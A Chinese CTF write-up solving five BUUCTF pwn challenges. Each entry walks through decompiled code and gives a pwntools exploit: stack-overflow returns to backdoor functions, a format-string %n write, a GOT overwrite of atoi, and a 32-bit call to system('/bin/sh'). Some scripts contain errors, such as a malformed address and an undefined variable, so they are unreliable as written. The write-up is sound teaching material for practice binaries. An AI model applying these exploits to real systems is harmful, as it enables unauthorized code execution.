buu pwn wp（持续更新）

1、warmup_csaw_2016

main函数如下

__int64 __fastcall main(int a1, char **a2, char **a3)
{
  char s[64]; // [rsp+0h] [rbp-80h] BYREF
  char v5[64]; // [rsp+40h] [rbp-40h] BYREF

  write(1, "-Warm Up-\n", 0xAuLL);
  write(1, "WOW:", 4uLL);
  sprintf(s, "%p\n", sub_40060D);
  write(1, s, 9uLL);
  write(1, ">", 1uLL);
  return gets(v5);
}

1. 首先使用write函数打印文字引导"-Warm Up-", 新行
2. 打印"WOW:", 不换行
3. 使用sprintf函数将当前sub_40060D函数的地址以16进制格式打印到字符串s中,打印地址和新行
4. 打印">",不换行
5. 使用gets函数从标准输入读取一行字符到缓冲区v5中
6. 返回gets函数读取到的字符数量

提示我们查看sub_40060D函数

sub_40060D函数如下：

int sub_40060D()
{
  return system("cat flag.txt");
}

发现是后门函数，可以利用get函数进行栈溢出

exp：

from pwn import *
r = remote("node4.buuoj.cn",25798)
offset = 0x40+8
payload = b'a'*offset+p64(0x0x40060d)
r.sendline(payload)
r.interactive()

2、ciscn_2019_n_1

main函数如下：

int __cdecl main(int argc, const char **argv, const char **envp)
{
  setvbuf(_bss_start, 0LL, 2, 0LL);
  setvbuf(stdin, 0LL, 2, 0LL);
  func();
  return 0;
}

这段代码是 C 语言主函数 main 的实现:

• main 函数的参数及返回值符合标准 C 语言主函数定义
• argc 和 argv 是命令行参数,envp 是环境变量
• setvbuf 函数是设置输入/输出缓冲方式的函数:
  • _bss_start 是未初始化数据段的起始位置
  • 0LL 表示不使用缓冲
  • 2 表示使用行缓冲模式
  • 0LL 表示缓冲区大小由函数自动决定
• 因此 setvbuf 为 _bss_start 和标准输入 stdin 设置行缓冲模式
• 调用 func() 函数
• 返回 0 表示程序成功终止

主要功能是:

1. 设置未初始化数据段和标准输入为行缓冲模式
2. 调用函数 func
3. 返回主函数退出码 0

继续查看func()函数：

int func()
{
  int result; // eax
  char v1[44]; // [rsp+0h] [rbp-30h] BYREF
  float v2; // [rsp+2Ch] [rbp-4h]

  v2 = 0.0;
  puts("Let's guess the number.");
  gets(v1);
  if ( v2 == 11.28125 )
    result = system("cat /flag");
  else
    result = puts("Its value should be 11.28125");
  return result;
}

有两种方法：

1.利用gets(v1)进行栈溢出，然后执行system("cat /flag")

字符串v1：

exp如下：

from pwn import *
r = remote("node4.buuoj.cn",25798)
sys_addr = 0x4006BE
payload = b'A'*(0x30+8) + p64(sys_addr)
r.send(payload)
r.interactive()

2.利用gets(v1)进行栈溢出，覆盖到v2的部分，将v2的值修改为11.28125

观察到v2是从0x04开始，我们需要覆盖0x30-0x04个a

这行disassemble代码是对xmm0和存储在cs段中的地址0x4007F4处double字进行单精度浮点数比较的ucomiss指令。

具体来说:

• ucomiss:单精度浮点数比较指令,比较xmm0和直接地址指定的单精度浮点数,结果存储在状态寄存器中。
• xmm0:xmm寄存器,用于存放单精度浮点数操作数。
• cs:dword_4007F4:使用cs段基址加上偏移0x4007F4处存放的单精度浮点数。
• cs段是代码段,通常存储程序代码及静态数据,0x4007F4处可能是某个全局单精度浮点数常量。

所以这条指令是将xmm0寄存器中的单精度浮点数与存储在0x4007F4地址处的单精度浮点常量进行比较,结果通过状态寄存器表示哪个数较大或两数是否相等。

一般情况下这种cmp指令常用于判断单精度浮点数是否满足某个条件,属于浮点数比较及条件判断常用操作。

我们跟进0x4007F4，发现此处存放着41348000h，即11.28125的十六进制。

于是exp如下：

from pwn import *

p=remote('node3.buuoj.cn',29191)
offset = 0x30-0x04
payload = "A"*offset + p64(0x41348000)
p.sendline(payload)

p.interactive()

3、pwn1_sctf_2016

32位

main函数如下：

int __cdecl main(int argc, const char **argv, const char **envp)
{
  vuln();
  return 0;
}

vuln()函数如下：

int vuln()
{
  const char *v0; // eax
  char s[32]; // [esp+1Ch] [ebp-3Ch] BYREF
  char v3[4]; // [esp+3Ch] [ebp-1Ch] BYREF
  char v4[7]; // [esp+40h] [ebp-18h] BYREF
  char v5; // [esp+47h] [ebp-11h] BYREF
  char v6[7]; // [esp+48h] [ebp-10h] BYREF
  char v7[5]; // [esp+4Fh] [ebp-9h] BYREF

  printf("Tell me something about yourself: ");
  fgets(s, 32, edata);
  std::string::operator=(&input, s);
  std::allocator<char>::allocator(&v5);
  std::string::string(v4, "you", &v5);
  std::allocator<char>::allocator(v7);
  std::string::string(v6, "I", v7);
  replace((std::string *)v3);
  std::string::operator=(&input, v3, v6, v4);
  std::string::~string(v3);
  std::string::~string(v6);
  std::allocator<char>::~allocator(v7);
  std::string::~string(v4);
  std::allocator<char>::~allocator(&v5);
  v0 = (const char *)std::string::c_str((std::string *)&input);
  strcpy(s, v0);
  return printf("So, %s\n", s);
}

这段代码实现了一个简单的字符串替换。

主要步骤:

1. 使用printf打印提示用户输入个人信息
2. 使用fgets获取输入存入缓冲区s
3. 将s赋值给全局变量input
4. 构造两个子字符串"you"和"I"
5. 调用replace函数替换input中的"I"为"you"
6. 打印替换后的结果

fgets(s, 32, edata);只能读入32个字符

而s从0x3C开始，32个字符无法溢出，但是由于程序会把I替换成you

于是我们就可以造成溢出了

exp如下：

from pwn import *

#r = process('/home/miyu/桌面/warmup_csaw_2016')
#attach(r)
r = remote("node4.buuoj.cn",25798)

payload = b'I'*20+b'a'*4 + p32(0x8048F0D)
r.sendline(payload)

r.interactive()

4.[第五空间2019 决赛]PWN5

main函数：

int __cdecl main(int a1)
{
  unsigned int v1; // eax
  int result; // eax
  int fd; // [esp+0h] [ebp-84h]
  char nptr[16]; // [esp+4h] [ebp-80h] BYREF
  char buf[100]; // [esp+14h] [ebp-70h] BYREF
  unsigned int v6; // [esp+78h] [ebp-Ch]
  int *v7; // [esp+7Ch] [ebp-8h]

  v7 = &a1;
  v6 = __readgsdword(0x14u);
  setvbuf(stdout, 0, 2, 0);
  v1 = time(0);
  srand(v1);
  fd = open("/dev/urandom", 0);
  read(fd, &dword_804C044, 4u);
  printf("your name:");
  read(0, buf, 0x63u);
  printf("Hello,");
  printf(buf);
  printf("your passwd:");
  read(0, nptr, 0xFu);
  if ( atoi(nptr) == dword_804C044 )
  {
    puts("ok!!");
    system("/bin/sh");
  }
  else
  {
    puts("fail");
  }
  result = 0;
  if ( __readgsdword(0x14u) != v6 )
    sub_80493D0();
  return result;

可以发现，第21行printf(buf);存在格式化字符串漏洞

首先我们确定偏移是10

然后我们确定dword_804C044bss字段的地址为0x0804C044

• 解法一：

我们可以构造

payload = p32(bss)+p32(bss+1)+p32(bss+2)+p32(bss+3)#4bytes
payload=payload+b'%10$n%11$n%12$n%13$n'

exp如下：

from pwn import *
p = remote("node4.buuoj.cn",28174)
bss = 0x0804C044
payload = p32(bss)+p32(bss+1)+p32(bss+2)+p32(bss+3)#4bytes
payload=payload+b'%10$n%11$n%12$n%13$n'
p.sendline(payload)
p.sendline(str(0x10101010))
p.interactive()

• 解法二：

利用pwntools自带的fmtstr_payload

from pwn import *
p = remote('node4.buuoj.cn',28174)
elf = ELF('/home/miyu/Desktop/pwn')
atoi_got = elf.got['atoi']
system_plt = elf.plt['system']
payload=fmtstr_payload(10,{atoi_got:system_plt})
p.sendline(payload)
p.sendline(b'/bin/sh\x00')
p.interactive()

5.jarvisoj_level2

32位栈溢出＋构造ROP链

from pwn import *
p = remote("node4.buuoj.cn",26412)
binsh = 0x0804A024
system_plt = 0x8048320
offset = 0x88+4
payload = b'a'*offset+p32(system)+p32(0)+p32(binsh)
p.sendline(payload)
p.interactive()

32位不用ROPgadget查rdi，直接p32(一个常数)即可